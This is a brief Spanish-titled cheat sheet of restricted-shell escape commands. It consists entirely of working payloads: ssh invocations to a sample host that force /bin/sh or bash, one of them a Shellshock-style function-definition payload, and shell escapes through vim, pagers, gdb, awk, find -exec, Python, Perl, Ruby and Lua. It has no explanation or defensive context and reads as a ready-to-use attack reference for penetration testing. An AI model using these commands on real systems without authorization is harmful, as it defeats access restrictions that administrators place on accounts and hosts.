Restricted Shell
Escapar de una Restricted Shell
ssh user@10.0.0.3 -t "/bin/sh"
ssh user@10.0.0.3 -t "bash --noprofile"
ssh user@10.0.0.3 -t "(){:;}; /bin/bash"
# Vim
:set shell=/bin/bash
:shell
# more, less, man, ftp, gdb
'! /bin/sh'
'!/bin/sh'
'!bash'
# AWK
awk 'BEGIN {system("/bin/sh")}'
# Find
find / -name offsec -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
# Python
exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
# Perl
exec "/bin/sh";
# Ruby
exec "/bin/sh"
# Lua
os.execute('/bin/sh')